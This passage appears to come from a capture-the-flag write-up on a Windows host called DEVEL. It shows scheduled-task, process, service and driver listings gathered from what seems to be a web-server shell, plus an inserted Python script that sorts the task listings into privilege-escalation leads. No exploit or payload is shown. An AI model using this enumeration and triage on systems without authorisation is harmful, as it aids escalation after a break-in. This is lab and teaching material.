Start In:                             N/A
Comment:                              This task controls periodic background synchronization of Offline Files when the user is working in an offline mode.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        6 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Logon Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task initiates synchronization of Offline Files when a user logs onto the system.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\PLA
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
Next Run Time:                        24/9/2019 7:25:41
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:10:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\powercfg.exe -energy -auto
Start In:                             N/A
Comment:                              This job analyzes the system looking for conditions that may cause high energy use.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 5 minutes, If Not Idle Retry For 120 minutes
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 00:05:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           6:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 Every 14 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\RAC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:12:49
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:07:44
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           31/3/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        1 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Shell
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControls
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Notifications for actions taken by Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControlsMigration
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:03
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Migration for Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SideShow
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\AutoWake
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task automatically wakes the computer and then puts it to sleep when automatic wake is turned on for a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\GadgetManager
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages and synchronizes metadata for the installed gadgets on a Windows SideShow-compatible device.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SessionAgent
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:17:56
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages the session behavior when multiple user accounts exist on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SystemDataProviders
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:18:11
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task provides system data for the clock, power source, wireless network strength, and volume on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SystemRestore
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           12:00:00
Start Date:                           14/6/2005
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Tcpip
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\TextServicesFramework
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\TextServicesFramework\MsCtfMonitor
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              TextServicesFramework monitor task
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Time Synchronization
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Time Synchronization\SynchronizeTime
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\sc.exe start w32time task_started
Start In:                             N/A
Comment:                              Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Windows Error Reporting
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Error Reporting\QueueReporting
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        18/3/2017 1:08:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\wermgr.exe -queuereporting
Start In:                             N/A
Comment:                              Windows Error Reporting task to process queued reports.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Filtering Platform
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Start In:                             N/A
Comment:                              This task adjusts the start type for firewall-triggered services when the start type of the Base Filtering Engine (BFE) is disabled.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Media Sharing
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Media Sharing\UpdateLibrary
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
Start In:                             N/A
Comment:                              This task updates the cached list of folders and the security permissions on any new files in a user's shared media library.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\WindowsBackup
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsBackup\ConfigNotification
Next Run Time:                        14/9/2019 10:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
Start In:                             N/A
Comment:                              This scheduled task notifies the user that Windows Backup has not been configured.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           10:00:00
Start Date:                           24/3/2017
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\WindowsColorSystem
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows Defender
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time:                        14/9/2019 3:11:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
Start In:                             N/A
Comment:                              Scheduled Scan
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:11:42
Start Date:                           1/1/2000
End Date:                             1/1/2100
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

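Scheduled-task records like the ones above are raw material for privilege-escalation triage, and reading a few hundred of them by eye is slow. As an added example (not code from the original writeup), the Python below parses `schtasks /query /fo LIST /v` output, keeps the enabled tasks that run as a privileged principal, and lists the binary each one executes so its ACL can be checked with `icacls`; binaries outside C:\Windows and C:\Program Files are listed first. The sample records are constructed from the fields shown on this page, plus one invented `\Constructed\NightlyBackup` task so that a hit is visible.

```python
"""Triage `schtasks /query /fo LIST /v` output for privilege-escalation leads.

Added example, not code from the original writeup. Records are blank-line
separated "Key: value" blocks, as in the page's DEVEL output.
"""
import re

# Principals that run with more privilege than an IIS worker (w3wp.exe) shell.
PRIVILEGED = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE", "ADMINISTRATORS"}

# Roots where an unprivileged user normally has no write access.
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample: three records copied from the page's fields plus one
# invented task (\Constructed\NightlyBackup) to show what a hit looks like.
SAMPLE = r"""
Folder: \Microsoft\Windows Defender
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows Defender\MP Scheduled Scan
Task To Run:                          c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM

Folder: \Microsoft\Windows\WindowsBackup
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsBackup\ConfigNotification
Task To Run:                          %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
Scheduled Task State:                 Enabled
Run As User:                          LOCAL SERVICE

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Task To Run:                          COM handler
Scheduled Task State:                 Disabled
Run As User:                          Users

HostName:                             DEVEL
TaskName:                             \Constructed\NightlyBackup
Task To Run:                          C:\Scripts\backup.bat /full
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
"""


def parse_schtasks_list(text):
    """One dict per task. Only the first colon splits key from value, so paths
    such as c:\\... survive; the 'Folder:' header lines are skipped."""
    tasks = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            if line.startswith("Folder:") or ":" not in line:
                continue
            key, _, value = line.partition(":")
            rec[key.strip()] = value.strip()
        if "TaskName" in rec:
            tasks.append(rec)
    return tasks


# Unquoted command: the executable ends at the first script/exe extension.
EXE = re.compile(r"(?i)^(.+?\.(?:exe|bat|cmd|vbs|ps1))(?:\s|$)")


def command_path(task_to_run):
    """Executable part of a 'Task To Run' value; None for COM handlers."""
    cmd = task_to_run.strip()
    if cmd.startswith('"'):                  # quoted path: up to the closing quote
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else None
    m = EXE.match(cmd)
    return m.group(1) if m else None


def normalise(path):
    """Lower-case and expand the two variables that appear in the page's output."""
    return (path.lower()
            .replace("%systemroot%", "c:\\windows")
            .replace("%programfiles%", "c:\\program files"))


def triage(tasks):
    """Enabled tasks under a privileged principal, with the binary to ACL-check.
    Binaries outside the protected roots are listed first."""
    findings = []
    for t in tasks:
        if t.get("Scheduled Task State") != "Enabled":
            continue
        run_as = t.get("Run As User", "").upper()
        if run_as not in PRIVILEGED:
            continue
        path = command_path(t.get("Task To Run", ""))
        if path is None:
            continue                          # COM handler: nothing on disk in this field
        binary = normalise(path)
        findings.append({
            "task": t["TaskName"],
            "run_as": run_as,
            "binary": binary,
            "outside_protected_root": not binary.startswith(PROTECTED_ROOTS),
        })
    return sorted(findings, key=lambda f: not f["outside_protected_root"])


if __name__ == "__main__":
    for f in triage(parse_schtasks_list(SAMPLE)):
        flag = "CHECK" if f["outside_protected_root"] else "     "
        print(f'{flag} {f["run_as"]:14} {f["binary"]}  <- {f["task"]}')
```

The output is a worklist, not a verdict: a task only becomes an escalation path if the current user can write the binary, its directory, or a DLL it loads, which is what `icacls "<path>"` on each listed binary answers. On the DEVEL box every privileged task on the page lives under C:\Windows or C:\Program Files, which is consistent with the author moving on to kernel exploits instead.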
c:\windows\system32\inetsrv>tasklist /SVC
tasklist /SVC

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       264 N/A
csrss.exe                      344 N/A
wininit.exe                    384 N/A
csrss.exe                      396 N/A
winlogon.exe                   452 N/A
services.exe                   488 N/A
lsass.exe                      496 SamSs
lsm.exe                        504 N/A
svchost.exe                    608 DcomLaunch, PlugPlay, Power
svchost.exe                    672 RpcEptMapper, RpcSs
svchost.exe                    724 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
LogonUI.exe                    792 N/A
svchost.exe                    832 AudioEndpointBuilder, CscService, SysMain,
                                   TrkWks, UxSms
svchost.exe                    888 AeLookupSvc, gpsvc, iphlpsvc, LanmanServer,
                                   ProfSvc, Schedule, SENS, Themes, Winmgmt,
                                   wuauserv
svchost.exe                   1000 EventSystem, netprofm, nsi, sppuinotify,
                                   W32Time, WdiServiceHost, WinHttpAutoProxySv
svchost.exe                   1072 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc
spoolsv.exe                   1184 Spooler
svchost.exe                   1220 BFE, DPS, MpsSvc
svchost.exe                   1320 AppHostSvc
svchost.exe                   1392 FDResPub
svchost.exe                   1424 ftpsvc
VGAuthService.exe             1512 VGAuthService
vmtoolsd.exe                  1540 VMTools
svchost.exe                   1572 W3SVC, WAS
WmiPrvSE.exe                  2020 N/A
msdtc.exe                     1632 MSDTC
sppsvc.exe                    2696 sppsvc
svchost.exe                   2736 WinDefend
SearchIndexer.exe             2816 WSearch
TrustedInstaller.exe          3948 TrustedInstaller
w3wp.exe                      2584 N/A
cmd.exe                       3928 N/A
conhost.exe                   1240 N/A
tasklist.exe                  1052 N/A

c:\windows\system32\inetsrv>net start
net start
These Windows services are started:

   Application Experience
   Application Host Helper Service
   Base Filtering Engine
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Function Discovery Resource Publication
   Group Policy Client
   IP Helper
   Microsoft FTP Service
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Offline Files
   Plug and Play
   Power
   Print Spooler
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Security Accounts Manager
   Security Center
   Server
   Software Protection
   SPP Notification Service
   Superfetch
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Audio Endpoint Builder
   Windows Defender
   Windows Event Log
   Windows Firewall
   Windows Management Instrumentation
   Windows Modules Installer
   Windows Process Activation Service
   Windows Search
   Windows Time
   Windows Update
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation
   World Wide Web Publishing Service

The command completed successfully.


c:\windows\system32\inetsrv> DRIVERQUERY
 DRIVERQUERY

Module Name  Display Name           Driver Type   Link Date
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:59
ACPI         Microsoft ACPI Driver  Kernel        14/7/2009 2:11:11
AcpiPmi      ACPI Power Meter Drive Kernel        14/7/2009 2:16:36
adp94xx      adp94xx                Kernel        6/12/2008 1:59:55
adpahci      adpahci                Kernel        1/5/2007 8:29:26
